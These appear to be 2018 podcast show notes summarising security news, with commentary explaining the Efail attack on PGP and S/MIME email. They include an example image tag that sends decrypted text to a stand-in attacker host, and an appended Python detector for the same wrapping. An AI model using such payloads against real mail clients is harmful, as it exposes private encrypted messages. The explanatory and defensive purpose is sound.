HNNEpisode173

From Paul's Security Weekly

Hack Naked News #173

Recorded May 15, 2018 at G-Unit Studios in Rhode Island!


Hosts

  • Paul Asadoorian
    Embedded device security researcher, security podcaster, and CEO of Active Countermeasures.
  • Jason Wood
    Security consultant, penetration tester, sysadmin, and Founder of Paladin Security.
  • Announcements:

    • Go to itpro.tv/securityweekly and use the code Secweekly30 to try it FREE for 7 days, and receive 30% off your monthly membership for the lifetime of your active subscription.
    • Check out our On-Demand material! Some of our previously recorded webcasts are now available On-Demand at: securityweekly.com/ondemand.
    • Our upcoming webcast with Javelin Networks on Overcoming the Limitations of Privilege Account Management is being held on May 24 from noon - 1:00pm.

    Security News

    1. Police dog sniffs out USB drive to snare school hacker - Thanks to a trained police dog sniffing out a thumb drive hidden inside a box of tissues, a high schooler in a San Francisco Bay Area suburb has been accused of hacking grades: some students’ grades got bumped up, and some got elbowed down. The attack started as a phishing attack: a teacher fell for it and entered their login credentials. The student used the login credentials and apparently did not mask his IP address. They traced the IP address to his house, and the dog found the USB drive.
    2. Secrets of the Wiper: Inside the World's Most Destructive Malware - Cisco Talos researcher Vitor Ventura, along with contributions from Martin Lee, noted in a report published on Tuesday, that malware with destructive payloads has been around since the early days of virus development. However, the delivery methods and level of destruction of wiper malware have evolved. Damage can range from the overwriting of specific files to the destruction of the entire file system; and the amount of data impacted and the difficulty of the recovery process is a direct consequence of the technique used. Motives can range from covering the attackers' tracks (which also potentially gives away the fact that you've been hacked) to sending a political message.
    3. Samsung Patches Six Critical Bugs in Flagship Handsets - Samsung began rolling out patches over the weekend to fix six critical bugs found in its flagship Android handsets as part of its May patch bulletin. Flaws range from a remote code execution bug to a buffer overflow vulnerability, plus a peek-and-poke command bug that leaves memory locations open on targeted devices. The vulnerabilities were previously disclosed by Google, and Samsung is playing catch up, so update now.
    4. Hacking train Wi-Fi may expose passenger data and control systems - The research was conducted over several years, said Pen Test's Ken Munro. "In most cases they are pretty secure, although whether the Wi-Fi works or not is another matter," he added. But in a handful of cases Munro was able to bridge the wireless network to the wired network and find a database server containing default credentials, enabling him to access the credit card data of customers paying for the Wi-Fi, including the passenger's name, email address and card details. This seems to me like a similar threat against airplanes, where there is a lot of speculation and perhaps no major threat.
    5. Decade-old Efail flaws can leak plaintext of PGP- and S/MIME-encrypted emails - The most serious vulnerabilities have resided in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. Flaws in the way the programs handle emails with multiple body parts make it possible to embed invisible snippets of previously obtained encrypted text in new emails. By also including the Web address of an attacker-controlled server, the newly sent emails can cause the programs to send the corresponding plaintext to the server. The surreptitious exfiltration works against both the PGP and S/MIME standards. The article in the show notes contains a link to the full details, including the researchers' original paper. Many vendors have issued patches already.
    6. Kaspersky Lab to shift US customer data from Russia to Switzerland | ZDNet - On Tuesday, the cybersecurity firm said that "a number of core processes" will be shifted from Russia, including customer data storage systems and processing "for most regions." By the end of 2019, Kaspersky Lab hopes to have moved the infrastructure used for US customer data storage and processing to Zurich. Customer data from Europe, Singapore, Australia, Japan, and South Korea will also be moved, with other countries to follow.
    7. Chili's Discloses Data Breach Exposing Payment Card Information - Restaurant chain Chili's is the latest retailer to report a data breach involving point of sale (PoS) security. Brinker International, which operates over 1,600 Chili's restaurants globally, announced the data breach on May 12, after becoming aware of the security incident the day before. The company did not reveal how many customers have been impacted by the breach, though it did state that payment card information was stolen over a two-month period.
    8. Simple bug could lead to RCE flaw on apps built with Electron Framework - A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers. Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, WordPress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
    9. Hackers Reveal How Code Injection Attack Works in Signal Messaging App - Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina. The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction. This appears to be limited to the Signal Desktop app: The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.

    Expert Commentary

    Even more details on EFail PGP vulnerability

    My newsfeed is full of articles and posts on the PGP/GPG and S/MIME vulnerability that could allow an attacker to read decrypted email content. Understandably, you may feel this is pretty alarming news. PGP is supposed to be a very secure way to send an encrypted message via email, but now even that isn’t safe. Then you read the recommendation that is prominently displayed in the EFF’s post on the vulnerability. “Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.” Wait, so it’s better to send clear text email?? (And no, the researchers and the EFF are not advocating using clear text email. They recommend using other secure messaging systems instead.) So let’s talk through some of the highlights of this flaw and see if we can make more sense of what it means to us.

    First, do you use PGP to encrypt emails and send sensitive data to another party? I’ve used it occasionally, but not regularly. So the impact to me is actually fairly minimal. The same may apply to you. For those of you who do regularly use it, then you need to make some changes to how you transmit sensitive data. Here are some of the requirements needed to exploit this flaw.

    1. The attacker already has to have access to network traffic, the email server, or other systems so that they can capture and modify the encrypted message. Your attacker has to have this access and be targeting this type of data. Think intelligence agency here. If you are a Tibetan activist, then this could be a threat to you.

    2. You have to have your email client configured to use PGP and S/MIME and to automatically render external content, such as downloading images into your HTML format email.

    The rendering of remote content is an issue because of the way the attack plays out. The attacker intercepts the email on the way to your inbox and adds some additional content before and after the block of cipher text in the message. The added content before is an HTML image tag that points to the attacker’s server. The tag isn’t actually closed before the cipher text block. Basically, it’s missing the "> needed to close it. The cipher text follows and once that block is complete the attacker includes the "> to close the image tag. Your email client decrypts the encrypted message and now has an HTML formatted email that includes an image tag like <img src="http://attacker.com/encrypted message here">. The email client then attempts to download the image and includes the encrypted content as part of the URL. The attacker checks their web server logs and there’s the “secret” message. You will almost certainly notice that your encrypted message didn’t render right and something is obviously wrong.
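Added example, not from the show notes or the EFail paper: a mail-gateway style check for the wrapping described above, which walks a message's MIME parts and flags any HTML part that ends inside an unclosed URL attribute immediately before an encrypted part. The function names, the regular expression and the sample message (including the host collector.example) are constructed for illustration.

```python
import re
from email import message_from_bytes, policy

# HTML that ends inside a quoted URL attribute, e.g.  <img src="http://host/
DANGLING_ATTR = re.compile(
    r"""<\w+[^<>]*\b(?:src|href|background|action)\s*=\s*(["'])(?:(?!\1)[^<>])*\Z""",
    re.IGNORECASE)
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted"}

# Constructed sample (not a captured message): HTML, S/MIME blob, HTML.
SAMPLE = b"""\
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.example/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data
Content-Transfer-Encoding: base64

AAAA
--B
Content-Type: text/html

">
--B--
"""

def _is_encrypted(part):
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    payload = part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in payload

def find_efail_wrapping(raw):
    """Flag HTML parts that leave a URL attribute open before an encrypted part."""
    msg = message_from_bytes(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    findings = []
    for i, part in enumerate(leaves[:-1]):
        if part.get_content_type() != "text/html":
            continue
        m = DANGLING_ATTR.search(part.get_content().rstrip())
        if m and _is_encrypted(leaves[i + 1]):
            findings.append((i, m.group(0)))
    return findings
```

A hit means the client would treat the decrypted body as part of the URL if it concatenates the parts into one HTML document; an HTML part whose tag is closed before the encrypted part produces no finding.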

    Ok, that’s definitely bad, but we’ve known that there have been issues with dynamically loading remote content in emails for years. This just pairs it up with functionality that is supposed to be inherently secret and makes it not secret. There are some other issues that the researchers have documented in their research paper. I have a link to that paper in the show notes.

    The takeaway from this is that this vulnerability isn’t an issue with PGP itself, but with how it is implemented in email clients and encryption add-ons. Also, keep in mind that the attacker already has significant access into your systems and/or network traffic. If you are concerned that you could be a target for this, you can switch to other mechanisms for transmitting data. Signal is a recommendation from the EFF, though we’ve reported previously that they are getting some heat for using domain fronting and that could impact their service. You can stop using email add-ons to encrypt and decrypt your PGP messages and do that outside of the email client instead. Configure your client not to automatically fetch and render remote content. All of these will negate this attack.

    https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

    https://efail.de/efail-attack-paper.pdf

    https://www.grahamcluley.com/despite-efail-the-sky-is-not-falling/


